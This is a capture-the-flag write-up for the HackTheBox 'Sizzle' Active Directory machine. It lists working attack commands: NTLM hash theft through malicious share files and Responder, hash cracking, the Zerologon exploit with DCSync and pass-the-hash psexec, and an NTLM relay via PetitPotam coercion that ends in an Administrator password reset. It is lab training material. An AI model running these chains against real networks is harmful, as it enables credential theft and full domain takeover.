Post

Sizzle HackTheBox

Posted
Preview Image
By A45hw1n
views 3 min read
Sizzle HackTheBox

Sizzle HackTheBox

Sizzle is an insane machine from HackTheBox, which is exploitable by 2 main unintended vulnerabilities. We start of with a guest share that is world readable and a folder in it was writable to perform a NTLM theft, (phishing attack) to obtain a set of credentials for a domain user and then since we have authentication we can perform an NTLM Reflection attack to obtain a SYSTEM LDAP shell which lets us grants DACL writes over to the administrator account, we then change the password for this account and takeover the whole domain.

image.png

Initial Foothold

Rustscan

1

rustscan -a 10.129.201.193 -r 1-65535 -- -sC -sV -vv 10.129.201.193

image.png

image.png

image.png

image.png

image.png

image.png

image.png

Scan identified that the windows server 2016 is running active directory on the box.

The domain name is htb.local and hostname of the box is SIZZLE.

So the FQDN be sizzle.htb.local.

SMB Enumeration

Lets check for the shares with the guest authentication.

1

nxc smb 10.129.201.193 -u '.' -p '' --shares

image.png

We have read access to one of the shares Department Shares lets connect to it using smbclient.

1

smbclient //10.129.201.193/'Department Shares' -U '.'%''

image.png

Lets download everything present in there.

image.png

Here are some users present.

And after some enumeration i found out that i have write access to the Public folder.

NTLM Theft

Since we have write access, lets check for the NTLM Theft.

I will generate all the malicious files.

1

python3 /opt/ntlm_theft/ntlm_theft.py -g all -s 10.10.14.20 -f malicious

image.png

Now Ill start responder as a listener.

1

python3 /opt/Responder/Responder.py -I tun0

image.png

Now will connect to the share and transfer all the files to the users/public folder.

1

smbclient //10.129.201.193/'Department Shares' -U '.'%''

image.png

After a while we get a hit on our responder tab.

image.png

Lets crack this hash using hashcat.

1

hashcat -m 5600 amandahash.txt /usr/share/wordlists/rockyou.txt

image.png

It cracked and the credential found is Ashare1972

Bloodhound

Lets collect some bloodhound data.

1

rusthound -u amanda -p 'Ashare1972' -d htb.local -i 10.129.201.193 --adcs -z

image.png

Marking Amanda as owned in bloodhound and check for the outbounds from Amanda.

image.png

But since Kerberos port 88 on DC is filtered so we cant do shadowCredentials and targetedkerberoasting attacks.

Will add intended ways soon!, for privilege escalation please see below.

Privilege Escalation

ZEROLOGON (CVE-2020-1472) (unintended)

Since we know that this is a windows server 2016 it is vulnerable to CVE-2020-1472, which is zerologon vulnerability.

1

python3 cve-2020-1472-exploit.py 'SIZZLE$' 10.129.201.193

image.png

Exploiting this sets the DC’s password to a null string now we can perform a DCSync attack on the box using secretsdump.

1

secretsdump.py htb.local/'SIZZLE$'@SIZZLE.HTB.LOCAL -hashes ':31D6CFE0D16AE931B73C59D7E0C089C0'

image.png

Now we can psexec as administrator to get a system’s shell on the box.

1

psexec.py -hashes :f6b7160bfc91823792e0ac3a162c9267 htb.local/Administrator@10.129.201.193

image.png

Rooted!

And we can get user flag in mrlky desktop.

image.png

NTLM Reflection PetitPotam (unintended)

There is another unintended way to escalate privileges on this box using the NTLM Reflection attack since we have authentication.

For this to work the SMB Signing is set to True and LDAP signing is set to False.

SMB Signing - TRUE

LDAP Signing - FALSE

Add a malicious dns entry.

1

python3 /opt/krbrelayx/dnstool.py -u 'htb.local\amanda' -p 'Ashare1972' -d 10.10.14.20 -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -dns-ip 10.129.201.193 10.129.201.193 --allow-multiple

image.png

Start the ntlmrelayx server.

1

ntlmrelayx.py -smb2support -t ldap://10.129.201.193 -i -domain htb.local --remove-mic

image.png

Coercion using PetitPotam

1

nxc smb 10.129.201.193 -u 'amanda' -p 'Ashare1972' -M coerce_plus -o METHOD=Petitpotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

image.png

After the coercion, we get a hitback at our relay server and it opened a shell for us on localhost port 11000.

image.png

Connecting to the shell using nc.

1

nc 127.0.0.1 11000

image.png

Now we will use grant_control to modify rights over administrator account.

image.png

Lets use bloodyAD to change the password of administrator.

1

bloodyad -d active.htb -u 'amanda' -p 'Ashare1972' -i '10.129.201.193' set password Administrator 'aashwin10!'

image.png

Now lets login using psexec.py

1

psexec.py htb.local/Administrator:'aashwin10!'@10.129.201.193

image.png

Rooted!

image.png

Thanks for reading 😄

WriteUps, HackTheBox
WriteUp Sizzle HTB Enumeration Active Directory SMB DNS Poison Rusthound-CE Lateral Movement Bloodhound Privilege Escalation targeted kerberoasting Hash Cracking NTLM Reflection Relay NTLM Relay Unintended CVE-2020-1472 ZeroLogon LDAP Shell remove-mic Windows
This post is licensed under CC BY 4.0 by the author.